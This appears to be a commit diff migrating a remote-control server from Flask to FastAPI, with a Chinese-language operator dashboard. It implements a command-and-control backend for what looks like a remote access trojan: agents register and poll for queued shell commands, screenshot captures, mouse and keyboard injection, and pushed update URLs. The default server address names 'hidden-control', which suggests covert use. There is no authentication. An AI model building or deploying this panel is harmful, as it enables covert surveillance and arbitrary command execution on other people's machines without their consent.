Upload 5 files

Dockerfile

@@ -9,4 +9,4 @@ COPY . .
 
 EXPOSE 7860
 
-CMD ["gunicorn", "--bind", "0.0.0.0:7860", "--workers", "1", "--timeout", "120", "app:app"]
+CMD ["uvicorn", "app:app", "--host", "0.0.0.0", "--port", "7860"]

app.py

@@ -2,17 +2,25 @@
 import os
 import sqlite3
 import uuid
-import json
-import time
 import glob
 from datetime import datetime
-from flask import Flask, request, jsonify, send_file, render_template
-from werkzeug.utils import secure_filename
+from fastapi import FastAPI, Request, UploadFile, File, Form, HTTPException
+from fastapi.responses import HTMLResponse, FileResponse
+from fastapi.middleware.cors import CORSMiddleware
+from fastapi.staticfiles import StaticFiles
+from fastapi.templating import Jinja2Templates
+from typing import Optional
+import aiofiles
 
-app = Flask(__name__)
+app = FastAPI()
 
-HF_SPACE_ID = os.environ.get('SPACE_ID', '')
-HF_TOKEN = os.environ.get('HF_TOKEN', '')
+app.add_middleware(
+    CORSMiddleware,
+    allow_origins=["*"],
+    allow_credentials=True,
+    allow_methods=["*"],
+    allow_headers=["*"],
+)
 
 DB_PATH = os.environ.get('DB_PATH', '/tmp/data.db')
 UPLOAD_DIR = os.environ.get('UPLOAD_DIR', '/tmp/uploads')
@@ -71,228 +79,330 @@ def get_db():
     conn.row_factory = sqlite3.Row
     return conn
 
-@app.after_request
-def add_headers(response):
-    response.headers.add('Access-Control-Allow-Origin', '*')
-    response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
-    response.headers.add('Access-Control-Allow-Methods', 'GET,POST,PUT,DELETE,OPTIONS')
-    return response
+init_db()
 
-@app.route('/api/client/register', methods=['POST'])
-def register_client():
-    data = request.get_json()
+HTML_CONTENT = '''<!DOCTYPE html>
+<html lang="zh-CN">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>远程控制台</title>
+    <style>
+        * { margin: 0; padding: 0; box-sizing: border-box; }
+        body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: #1a1a2e; color: #eee; min-height: 100vh; }
+        .container { max-width: 1400px; margin: 0 auto; padding: 20px; }
+        h1 { text-align: center; margin-bottom: 30px; color: #00d9ff; }
+        .clients-section { margin-bottom: 30px; }
+        .section-title { font-size: 1.2em; margin-bottom: 15px; color: #aaa; }
+        .clients-grid { display: grid; grid-template-columns: repeat(auto-fill, minmax(280px, 1fr)); gap: 15px; }
+        .client-card { background: #16213e; border-radius: 10px; padding: 15px; border: 1px solid #0f3460; cursor: pointer; transition: all 0.3s; }
+        .client-card:hover { border-color: #00d9ff; }
+        .client-card.selected { border-color: #00d9ff; background: #1f4068; }
+        .client-card.offline { opacity: 0.5; }
+        .client-name { font-size: 1.1em; font-weight: bold; margin-bottom: 8px; }
+        .client-info { font-size: 0.85em; color: #888; }
+        .client-status { display: inline-block; padding: 2px 8px; border-radius: 4px; font-size: 0.8em; margin-top: 8px; }
+        .status-online { background: #00d9ff22; color: #00d9ff; }
+        .status-offline { background: #ff6b6b22; color: #ff6b6b; }
+        .panel { background: #16213e; border-radius: 10px; padding: 20px; border: 1px solid #0f3460; display: none; }
+        .panel.active { display: block; }
+        .tabs { display: flex; gap: 10px; margin-bottom: 20px; border-bottom: 1px solid #0f3460; padding-bottom: 10px; flex-wrap: wrap; }
+        .tab { padding: 8px 16px; border-radius: 5px; cursor: pointer; background: transparent; border: none; color: #888; transition: all 0.3s; }
+        .tab:hover { color: #00d9ff; }
+        .tab.active { background: #00d9ff; color: #1a1a2e; }
+        .command-input { display: flex; gap: 10px; margin-bottom: 15px; flex-wrap: wrap; }
+        .command-input input { flex: 1; min-width: 200px; padding: 10px; border-radius: 5px; border: 1px solid #0f3460; background: #1a1a2e; color: #eee; }
+        .btn { padding: 10px 20px; border-radius: 5px; border: none; cursor: pointer; background: #00d9ff; color: #1a1a2e; font-weight: bold; }
+        .btn:hover { opacity: 0.9; }
+        .btn-danger { background: #ff6b6b; }
+        .btn-success { background: #00ff88; }
+        .output { background: #0a0a15; border-radius: 5px; padding: 15px; min-height: 200px; max-height: 400px; overflow-y: auto; font-family: monospace; white-space: pre-wrap; }
+        .screenshot-view { text-align: center; }
+        .screenshot-view img { max-width: 100%; border-radius: 5px; }
+        .no-client { text-align: center; color: #666; padding: 50px; }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <h1>远程控制台</h1>
+        <div class="clients-section">
+            <div class="section-title">在线客户端</div>
+            <div class="clients-grid" id="clientsGrid"></div>
+        </div>
+        <div class="panel" id="controlPanel">
+            <div class="tabs">
+                <button class="tab active" data-tab="shell">Shell</button>
+                <button class="tab" data-tab="screenshot">截图</button>
+                <button class="tab" data-tab="control">远程控制</button>
+            </div>
+            <div class="tab-content" id="tab-shell">
+                <div class="command-input">
+                    <input type="text" id="commandInput" placeholder="输入命令...">
+                    <button class="btn" onclick="sendCommand()">执行</button>
+                </div>
+                <div class="output" id="commandOutput">等待命令...</div>
+            </div>
+            <div class="tab-content" id="tab-screenshot" style="display:none;">
+                <button class="btn" onclick="requestScreenshot()">获取截图</button>
+                <div class="screenshot-view" id="screenshotView" style="margin-top:15px;"></div>
+            </div>
+            <div class="tab-content" id="tab-control" style="display:none;">
+                <p style="color:#888;margin-bottom:15px;">远程控制</p>
+                <div class="command-input">
+                    <button class="btn" onclick="sendMouseClick('left')">左键</button>
+                    <button class="btn" onclick="sendMouseClick('right')">右键</button>
+                    <input type="text" id="keyInput" placeholder="按键" style="flex:0.5;min-width:150px;">
+                    <button class="btn" onclick="sendKeyPress()">发送</button>
+                </div>
+            </div>
+        </div>
+        <div class="no-client" id="noClient">请选择一个客户端</div>
+    </div>
+    <script>
+        let selectedClient = null;
+        let pollInterval = null;
+        const API_BASE = '';
+        
+        async function loadClients() {
+            try {
+                const resp = await fetch('/api/clients');
+                const clients = await resp.json();
+                const grid = document.getElementById('clientsGrid');
+                grid.innerHTML = clients.length ? '' : '<p style="color:#666;">暂无在线客户端</p>';
+                clients.forEach(client => {
+                    const card = document.createElement('div');
+                    card.className = 'client-card' + (client.status === 'offline' ? ' offline' : '');
+                    card.onclick = () => selectClient(client);
+                    const lastSeen = client.last_seen ? new Date(client.last_seen).toLocaleString() : 'N/A';
+                    card.innerHTML = `<div class="client-name">${client.name || 'Unknown'}</div>
+                        <div class="client-info">ID: ${(client.id || '').substring(0, 8)}...</div>
+                        <div class="client-status ${client.status === 'online' ? 'status-online' : 'status-offline'}">${client.status}</div>
+                        <div class="client-info">${lastSeen}</div>`;
+                    grid.appendChild(card);
+                });
+            } catch(e) { console.error(e); }
+        }
+        
+        function selectClient(client) {
+            selectedClient = client;
+            document.querySelectorAll('.client-card').forEach(c => c.classList.remove('selected'));
+            document.querySelectorAll('.client-card').forEach(c => { if((c.innerHTML || '').includes((client.id || '').substring(0, 8))) c.classList.add('selected'); });
+            document.getElementById('controlPanel').classList.add('active');
+            document.getElementById('noClient').style.display = 'none';
+            startPolling();
+        }
+        
+        function startPolling() {
+            if (pollInterval) clearInterval(pollInterval);
+            pollInterval = setInterval(pollCommands, 3000);
+        }
+        
+        async function pollCommands() {
+            if (!selectedClient) return;
+            try {
+                const resp = await fetch('/api/client/heartbeat', {
+                    method: 'POST', headers: {'Content-Type': 'application/json'},
+                    body: JSON.stringify({client_id: selectedClient.id})
+                });
+                const data = await resp.json();
+                if (data.commands && data.commands.length > 0) {
+                    data.commands.forEach(cmd => executeCommand(cmd));
+                }
+            } catch(e) { console.error(e); }
+        }
+        
+        async function executeCommand(cmd) {
+            document.getElementById('commandOutput').textContent = '执行: ' + cmd.payload;
+            await fetch('/api/command/result', {
+                method: 'POST', headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({command_id: cmd.id, status: 'executed'})
+            });
+        }
+        
+        async function sendCommand() {
+            const cmd = document.getElementById('commandInput').value.trim();
+            if (!cmd || !selectedClient) return;
+            document.getElementById('commandOutput').textContent = '发送: ' + cmd;
+            await fetch('/api/command', {
+                method: 'POST', headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({client_id: selectedClient.id, type: 'shell', payload: cmd})
+            });
+            document.getElementById('commandInput').value = '';
+        }
+        
+        async function requestScreenshot() {
+            if (!selectedClient) return;
+            document.getElementById('screenshotView').innerHTML = '<p style="color:#888;">获取中...</p>';
+            await fetch('/api/command', {
+                method: 'POST', headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({client_id: selectedClient.id, type: 'screenshot', payload: ''})
+            });
+            setTimeout(loadScreenshot, 2000);
+        }
+        
+        async function loadScreenshot() {
+            if (!selectedClient) return;
+            const t = Date.now();
+            document.getElementById('screenshotView').innerHTML = `<img src="/api/screenshots/${selectedClient.id}?t=${t}">`;
+        }
+        
+        async function sendMouseClick(button) {
+            if (!selectedClient) return;
+            await fetch('/api/command', {
+                method: 'POST', headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({client_id: selectedClient.id, type: 'mouse_click', payload: JSON.stringify({button: button, x: 0, y: 0})})
+            });
+        }
+        
+        async function sendKeyPress() {
+            const key = document.getElementById('keyInput').value.trim();
+            if (!key || !selectedClient) return;
+            await fetch('/api/command', {
+                method: 'POST', headers: {'Content-Type': 'application/json'},
+                body: JSON.stringify({client_id: selectedClient.id, type: 'key_press', payload: key})
+            });
+        }
+        
+        document.querySelectorAll('.tab').forEach(tab => {
+            tab.onclick = () => {
+                document.querySelectorAll('.tab').forEach(t => t.classList.remove('active'));
+                document.querySelectorAll('.tab-content').forEach(c => c.style.display = 'none');
+                tab.classList.add('active');
+                document.getElementById('tab-' + tab.dataset.tab).style.display = 'block';
+            };
+        });
+        
+        document.getElementById('commandInput').onkeypress = e => { if (e.key === 'Enter') sendCommand(); };
+        loadClients(); setInterval(loadClients, 5000);
+    </script>
+</body>
+</html>'''
+
+@app.get("/")
+async def root():
+    return HTMLResponse(content=HTML_CONTENT)
+
+@app.post("/api/client/register")
+async def register_client(request: Request):
+    data = await request.json()
     client_id = data.get('id') or str(uuid.uuid4())
     name = data.get('name', 'Unknown')
     version = data.get('version', '')
     os_info = data.get('os', '')
     
     conn = get_db()
-    conn.execute('''
-        INSERT OR REPLACE INTO clients (id, name, status, last_seen, version, os, ip)
-        VALUES (?, ?, 'online', ?, ?, ?, ?)
-    ''', (client_id, name, datetime.now().isoformat(), version, os_info, request.remote_addr))
+    conn.execute('''INSERT OR REPLACE INTO clients (id, name, status, last_seen, version, os, ip)
+        VALUES (?, ?, 'online', ?, ?, ?, ?)''',
+        (client_id, name, datetime.now().isoformat(), version, os_info, request.client.host))
     conn.commit()
     conn.close()
     
-    return jsonify({'id': client_id, 'name': name, 'status': 'online'})
+    return {'id': client_id, 'name': name, 'status': 'online'}
 
-@app.route('/api/client/heartbeat', methods=['POST'])
-def heartbeat():
-    data = request.get_json()
+@app.post("/api/client/heartbeat")
+async def heartbeat(request: Request):
+    data = await request.json()
     client_id = data.get('client_id')
     
     conn = get_db()
     conn.execute("UPDATE clients SET last_seen = ?, status = 'online' WHERE id = ?", 
-                 (datetime.now().isoformat(), client_id))
-    
-    cmd = conn.execute('''
-        SELECT id, client_id, type, payload, status FROM commands
-        WHERE client_id = ? AND status = 'pending'
-        ORDER BY created_at ASC LIMIT 1
-    ''', (client_id,)).fetchone()
-    
+                (datetime.now().isoformat(), client_id))
+    cmd = conn.execute('''SELECT id, client_id, type, payload, status FROM commands
+        WHERE client_id = ? AND status = 'pending' ORDER BY created_at ASC LIMIT 1''', (client_id,)).fetchone()
     conn.commit()
     conn.close()
     
     if cmd:
-        return jsonify({'commands': [dict(cmd)]})
-    return jsonify({'commands': []})
+        return {'commands': [dict(cmd)]}
+    return {'commands': []}
 
-@app.route('/api/command', methods=['POST'])
-def send_command():
-    data = request.get_json()
+@app.post("/api/command")
+async def send_command(request: Request):
+    data = await request.json()
     cmd_id = str(uuid.uuid4())
     client_id = data.get('client_id')
     cmd_type = data.get('type', 'shell')
     payload = data.get('payload', '')
     
     conn = get_db()
-    conn.execute('''
-        INSERT INTO commands (id, client_id, type, payload, status, created_at)
-        VALUES (?, ?, ?, ?, 'pending', ?)
-    ''', (cmd_id, client_id, cmd_type, payload, datetime.now().isoformat()))
+    conn.execute('''INSERT INTO commands (id, client_id, type, payload, status, created_at)
+        VALUES (?, ?, ?, ?, 'pending', ?)''',
+        (cmd_id, client_id, cmd_type, payload, datetime.now().isoformat()))
     conn.commit()
     conn.close()
     
-    return jsonify({'id': cmd_id, 'status': 'pending'})
+    return {'id': cmd_id, 'status': 'pending'}
 
-@app.route('/api/command/result', methods=['POST'])
-def command_result():
-    data = request.get_json()
+@app.post("/api/command/result")
+async def command_result(request: Request):
+    data = await request.json()
     cmd_id = data.get('command_id')
     result = data.get('result', '')
     status = data.get('status', 'completed')
     
     conn = get_db()
-    conn.execute("UPDATE commands SET result = ?, status = ? WHERE id = ?", 
-                 (result, status, cmd_id))
+    conn.execute("UPDATE commands SET result = ?, status = ? WHERE id = ?", (result, status, cmd_id))
     conn.commit()
     conn.close()
     
-    return jsonify({'status': 'ok'})
+    return {'status': 'ok'}
 
-@app.route('/api/screenshot', methods=['POST'])
-def upload_screenshot():
-    client_id = request.form.get('client_id')
-    if not client_id:
-        return jsonify({'error': 'client_id required'}), 400
-    
-    if 'screenshot' not in request.files:
-        return jsonify({'error': 'no file'}), 400
-    
-    file = request.files['screenshot']
-    if file.filename == '':
-        return jsonify({'error': 'empty filename'}), 400
-    
-    ext = os.path.splitext(file.filename)[1] or '.jpg'
-    filename = f'{client_id}_{int(time.time())}{ext}'
+@app.post("/api/screenshot")
+async def upload_screenshot(client_id: str = Form(...), screenshot: UploadFile = File(...)):
+    ext = os.path.splitext(screenshot.filename)[1] or '.jpg'
+    filename = f'{client_id}_{int(datetime.now().timestamp())}{ext}'
     filepath = f'{UPLOAD_DIR}/screenshots/{filename}'
-    file.save(filepath)
-    
-    conn = get_db()
-    conn.execute("UPDATE clients SET last_seen = ? WHERE id = ?", 
-                 (datetime.now().isoformat(), client_id))
-    conn.commit()
-    conn.close()
-    
-    return jsonify({'url': f'/uploads/screenshots/{filename}'})
-
-@app.route('/api/file/upload', methods=['POST'])
-def upload_file():
-    client_id = request.form.get('client_id')
-    if not client_id:
-        return jsonify({'error': 'client_id required'}), 400
-    
-    if 'file' not in request.files:
-        return jsonify({'error': 'no file'}), 400
     
-    file = request.files['file']
-    filename = secure_filename(file.filename)
-    if filename == '':
-        return jsonify({'error': 'empty filename'}), 400
+    content = await screenshot.read()
+    async with aiofiles.open(filepath, 'wb') as f:
+        await f.write(content)
     
-    save_filename = f'{client_id}_{filename}'
-    filepath = f'{UPLOAD_DIR}/files/{save_filename}'
-    file.save(filepath)
-    
-    file_id = str(uuid.uuid4())
     conn = get_db()
-    conn.execute('''
-        INSERT INTO files (id, client_id, filename, size, uploaded_at)
-        VALUES (?, ?, ?, ?, ?)
-    ''', (file_id, client_id, filename, os.path.getsize(filepath), datetime.now().isoformat()))
+    conn.execute("UPDATE clients SET last_seen = ? WHERE id = ?", (datetime.now().isoformat(), client_id))
     conn.commit()
     conn.close()
     
-    return jsonify({'id': file_id, 'filename': save_filename})
+    return {'url': f'/api/screenshots/{filename}'}
 
-@app.route('/api/file/download', methods=['GET'])
-def download_file():
-    filename = request.args.get('filename')
-    if not filename:
-        return jsonify({'error': 'filename required'}), 400
-    return send_file(f'{UPLOAD_DIR}/files/{filename}')
+@app.get("/api/screenshots/{client_id}")
+async def get_screenshot(client_id: str):
+    pattern = f'{UPLOAD_DIR}/screenshots/{client_id}_*'
+    files = sorted(glob.glob(pattern), key=os.path.getmtime, reverse=True)
+    if files:
+        return FileResponse(files[0], media_type='image/jpeg')
+    raise HTTPException(status_code=404, detail="No screenshot")
 
-@app.route('/api/clients', methods=['GET'])
-def get_clients():
+@app.get("/api/clients")
+async def get_clients():
     conn = get_db()
     clients = conn.execute('SELECT * FROM clients ORDER BY last_seen DESC').fetchall()
     conn.close()
-    return jsonify([dict(row) for row in clients])
+    return [dict(row) for row in clients]
 
-@app.route('/api/commands', methods=['GET'])
-def get_commands():
-    client_id = request.args.get('client_id')
-    if not client_id:
-        return jsonify({'error': 'client_id required'}), 400
-    
-    conn = get_db()
-    commands = conn.execute('''
-        SELECT * FROM commands WHERE client_id = ? ORDER BY created_at DESC
-    ''', (client_id,)).fetchall()
-    conn.close()
-    return jsonify([dict(row) for row in commands])
-
-@app.route('/api/config', methods=['GET'])
-def get_config():
-    conn = get_db()
-    configs = conn.execute('SELECT key, value FROM configs').fetchall()
-    conn.close()
-    
-    config = {
-        'server_url': os.environ.get('SERVER_URL', request.host_url),
+@app.get("/api/config")
+async def get_config():
+    return {
+        'server_url': os.environ.get('SERVER_URL', 'https://profile114-hidden-control.hf.space'),
         'poll_interval': 5,
         'auto_update': True,
         'latest_version': '1.0.0',
         'download_url': ''
     }
-    
-    for row in configs:
-        if row['key'] == 'latest_version':
-            config['latest_version'] = row['value']
-        elif row['key'] == 'download_url':
-            config['download_url'] = row['value']
-    
-    return jsonify(config)
 
-@app.route('/api/config/update', methods=['POST'])
-def update_config():
-    data = request.get_json()
-    
+@app.post("/api/config/update")
+async def update_config(request: Request):
+    data = await request.json()
     conn = get_db()
     if data.get('latest_version'):
-        conn.execute('''
-            INSERT OR REPLACE INTO configs (key, value, updated_at)
-            VALUES (?, ?, ?)
-        ''', ('latest_version', data['latest_version'], datetime.now().isoformat()))
+        conn.execute('INSERT OR REPLACE INTO configs (key, value, updated_at) VALUES (?, ?, ?)',
+            ('latest_version', data['latest_version'], datetime.now().isoformat()))
     if data.get('download_url'):
-        conn.execute('''
-            INSERT OR REPLACE INTO configs (key, value, updated_at)
-            VALUES (?, ?, ?)
-        ''', ('download_url', data['download_url'], datetime.now().isoformat()))
+        conn.execute('INSERT OR REPLACE INTO configs (key, value, updated_at) VALUES (?, ?, ?)',
+            ('download_url', data['download_url'], datetime.now().isoformat()))
     conn.commit()
     conn.close()
-    
-    return jsonify({'status': 'ok'})
-
-@app.route('/')
-def index():
-    return render_template('index.html')
-
-@app.route('/api/screenshots/<client_id>')
-def get_screenshot(client_id):
-    pattern = f'{UPLOAD_DIR}/screenshots/{client_id}_*'
-    files = sorted(glob.glob(pattern), key=os.path.getmtime, reverse=True)
-    if files:
-        return send_file(files[0])
-    return jsonify({'error': 'No screenshot'}), 404
-
-@app.route('/uploads/<path:filename>')
-def serve_upload(filename):
-    return send_file(f'{UPLOAD_DIR}/{filename}')
+    return {'status': 'ok'}
 
-if __name__ == '__main__':
-    init_db()
-    port = int(os.environ.get('PORT', 8080))
-    print(f'Server running on port {port}')
-    app.run(host='0.0.0.0', port=port, debug=False)
+if __name__ == "__main__":
+    import uvicorn
+    uvicorn.run(app, host="0.0.0.0", port=7860)

requirements.txt

@@ -1,3 +1,5 @@
-Flask>=2.0.0
-werkzeug>=2.0.0
-gunicorn>=20.0.0
+fastapi>=0.100.0
+uvicorn[standard]>=0.23.0
+python-multipart>=0.0.6
+aiofiles>=23.0.0
+jinja2>=3.0.0